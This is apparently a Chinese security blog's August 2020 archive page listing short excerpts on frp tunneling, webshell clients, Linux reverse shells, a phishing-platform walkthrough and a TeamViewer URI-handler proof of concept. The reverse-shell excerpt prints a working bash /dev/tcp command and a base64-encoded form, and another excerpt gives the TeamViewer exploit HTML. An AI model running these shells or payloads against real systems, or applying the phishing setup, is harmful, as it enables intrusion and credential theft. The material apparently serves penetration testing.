08 2020 档案

摘要:简介:frp是一款使用go语言写的一个轻量级的内网穿透工具,其全名为Fast Reverse Proxy,支持TCP,UDP,HTTP,HTTPS等协议类型,话不多说开始上手。 1.肯定是要有一台vps,这里推荐学生党抓紧时间在什么腾讯云,阿里云去购买一年一百,买到就是赚到。 wget https: 阅读全文
posted @ 2020-08-28 09:33 wudixiaoherry 阅读(1229) 评论(0) 推荐(0) 编辑
摘要:文章来源与合天智汇 概述: 首先了解一下什么是webshell客户端,先问个问题,什么是客户端,什么是服务端? 很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,用于连接后门的程序是要求被服务的,比如执行个ps,目的是为了得到后门所在主机的进程列表,是“被 阅读全文
posted @ 2020-08-13 11:30 wudixiaoherry 阅读(2199) 评论(0) 推荐(1) 编辑
摘要:一、Linux反弹shell 姿势1 bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+ 阅读全文
posted @ 2020-08-13 11:06 wudixiaoherry 阅读(1295) 评论(0) 推荐(0) 编辑
摘要:一、首先要了解一下每一个模块的作用: 1:仪表盘,展示被攻击的详情 2:在此配置每次要进行的攻击 3:在这里设置要进行攻击的邮箱地址 4:设置钓鱼邮件模板 5:设置钓鱼页面模板 6:设置发送钓鱼邮件的邮箱 二、实战操作 1、在第6个选项设置要发送邮件的邮箱地址 然后点击绿色按钮进行测试发送,只需要填 阅读全文
posted @ 2020-08-13 10:11 wudixiaoherry 阅读(3316) 评论(0) 推荐(0) 编辑
摘要:<html><head>test poc</head><body><div><iframe style="height:1px;width:1px;" src='teamviewer10: --play \\127.0.0.1\share\fake.tvs'"></div></body></html 阅读全文
posted @ 2020-08-11 09:12 wudixiaoherry 阅读(159) 评论(0) 推荐(0) 编辑
摘要:最近要在客户现场做一次钓鱼测试,开始用的自己的云服务器搭了一个钓鱼平台,但是发现国内的25端口全被禁了,自己有没有国外的服务器没办法只能用自己的虚拟机了。 下面是安装步骤: 1、安装https协议、CA证书、dirmngr apt-get update 、apt-get install -y apt 阅读全文
posted @ 2020-08-05 12:30 wudixiaoherry 阅读(253) 评论(0) 推荐(0) 编辑